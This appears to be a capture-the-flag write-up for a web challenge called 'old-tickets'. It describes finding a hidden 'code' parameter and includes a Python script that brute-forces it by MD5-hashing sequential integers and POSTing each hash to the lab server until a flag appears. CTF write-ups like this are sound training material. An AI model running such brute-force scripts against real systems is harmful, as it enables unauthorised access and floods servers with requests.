old-tickets

Free tickets for everyone! Support tickets that you should resolve!

I captured the request in Burp Suite to see what headers were involved, but there was nothing special.

In a pentesting engagement, you need to perform different types of requests on the website to see if there are any errors or something interesting, and there are indeed some. When I make a POST request, I find an error in the source code. It seems that a parameter (code) is missing.

I added code as a new parameter, and this time I didn't get an error, but I also didn't get any response. After some time, I checked the source code and found an interesting line with a hash. I sent this hash as the code parameter, and now I have something interesting.

My first thought was that all I needed to do was add 1 and encode it as MD5, but that didn't work. After some attempts, I decided to make a script.

import requests
import hashlib
import re

url = 'http://34.107.71.117:31688/'

initial_bug = 1628168161
# data = {'code':"d63af914bd1b6210c358e145d61a8ab2"} -> need to send

for i in range(10000000):
	bug = initial_bug + i
	bug_string = str(bug)
	result = hashlib.md5(bug_string.encode()).hexdigest()
	data = {"name":"test","content":"test","code":result}
	response = requests.post(url, data = data)
	# verify in response if flag exists
	text = response.text
	pattern = r'ctf\{[0-9a-fA-F]{64}\}'
	match = re.search(pattern, text)
	if match:
		print("{+} Congrats, you did it!")
		# print("Check this one -> {} ".format(bug))
		print("{+} Here is your flag ",match.group())
		break

Previouswifiland Nextinodat

Last updated 1 year ago